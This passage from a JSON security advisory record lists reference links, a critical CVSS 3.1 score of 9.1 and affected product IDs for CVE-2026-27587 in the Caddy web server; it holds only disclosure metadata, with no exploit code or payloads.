"external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Ubuntu%2FUBUNTU-CVE-2026-27587.json?alt=media" }, { "category": "external", "summary": "Source - gitlab", "url": "https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fcaddyserver%2Fcaddy%2Fv2%2FCVE-2026-27587.yml/raw" }, { "category": "external", "summary": "Source - gitlab", "url": "https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fcaddyserver%2Fcaddy%2Fv2%2Fmodules%2Fcaddyhttp%2FCVE-2026-27587.yml/raw" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-g7pc-pc7g-h8jh" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.1" }, { "category": "external", "summary": "Reference - github; gitlab; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27587" }, { "category": "external", "summary": "Reference - github; gitlab; osv", "url": "https://github.com/caddyserver/caddy/commit/a1081194bfae4e0d8c227ec44aecb95eded55d1e" }, { "category": "external", "summary": "Reference - github; gitlab", "url": "https://github.com/advisories/GHSA-g7pc-pc7g-h8jh" }, { "category": "external", "summary": "Reference - osv", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/27xxx/CVE-2026-27587.json" }, { "category": "external", "summary": "Reference - github; gitlab; osv", "url": "https://pkg.go.dev/vuln/GO-2026-4538" }, { "category": "external", "summary": "Reference - osv", "url": "https://ubuntu.com/security/CVE-2026-27587" }, { "category": "external", "summary": "Reference - osv", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27587" }, { "category": "external", "summary": "Reference - gitlab", "url": "https://github.com/caddyserver/caddy" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-4034332", "CSAFPID-4034342", "CSAFPID-4034343", "CSAFPID-4034344", "CSAFPID-4034345", "CSAFPID-4034346", "CSAFPID-4034347", "CSAFPID-4034348", "CSAFPID-4034349", "CSAFPID-4034350", "CSAFPID-4034351", "CSAFPID-4034352", "CSAFPID-4034353", "CSAFPID-4034354", "CSAFPID-4034355", "CSAFPID-4034356", "CSAFPID-4034357", "CSAFPID-4034358", "CSAFPID-4034359", "CSAFPID-4034360", "CSAFPID-4034361", "CSAFPID-4034362", "CSAFPID-4034363", "CSAFPID-4034364", "CSAFPID-4034378", "CSAFPID-4034379", "CSAFPID-4034380", "CSAFPID-4034387", "CSAFPID-4034396", "CSAFPID-4034400", "CSAFPID-4034401", "CSAFPID-4034402", "CSAFPID-4034407", "CSAFPID-4034411", "CSAFPID-4034417", "CSAFPID-4034418", "CSAFPID-4034419", "CSAFPID-4034420", "CSAFPID-4034435", "CSAFPID-4034436", "CSAFPID-4034437", "CSAFPID-4034438", "CSAFPID-4034441", "CSAFPID-4034447", "CSAFPID-4034448", "CSAFPID-4034449", "CSAFPID-4034450", "CSAFPID-4034451", "CSAFPID-4034455", "CSAFPID-4034456", "CSAFPID-4034457", "CSAFPID-4034464", "CSAFPID-4034465", "CSAFPID-4034466", "CSAFPID-4034467", "CSAFPID-4034468", "CSAFPID-4034469", "CSAFPID-4034470", "CSAFPID-4034471", "CSAFPID-4034472", "CSAFPID-4034473", "CSAFPID-4034474", "CSAFPID-4034475", "CSAFPID-4034476", "CSAFPID-4034477", "CSAFPID-4034478", "CSAFPID-4034479", "CSAFPID-4034480", "CSAFPID-4034481", "CSAFPID-4034482", "CSAFPID-5688699", "CSAFPID-5700114", "CSAFPID-5700154", "CSAFPID-5700155", "CSAFPID-5700156", "CSAFPID-5700157", "CSAFPID-5700158", "CSAFPID-5700159", "CSAFPID-5700160", "CSAFPID-5700161", "CSAFPID-5700162", "CSAFPID-5700163", "CSAFPID-5700164", "CSAFPID-5700165", "CSAFPID-5700166", "CSAFPID-5700167", "CSAFPID-5700168", "CSAFPID-5700169", "CSAFPID-5700170", "CSAFPID-5700171", "CSAFPID-5700172", "CSAFPID-5700173", "CSAFPID-5700174", "CSAFPID-5700175", "CSAFPID-5700176", "CSAFPID-5700177", "CSAFPID-5700549", "CSAFPID-5706479", "CSAFPID-5735034", "CSAFPID-5735035", "CSAFPID-5735036", "CSAFPID-5735037", "CSAFPID-5913749", "CSAFPID-5913750", "CSAFPID-5913751", "CSAFPID-5913752", "CSAFPID-5913753", "CSAFPID-5913754", "CSAFPID-5913755", "CSAFPID-5913756", "CSAFPID-5913757", "CSAFPID-5913758", "CSAFPID-5913759", "CSAFPID-5913760", "CSAFPID-5918974", "CSAFPID-5918976" ] } ], "title": "CVE-2026-27587" } ] }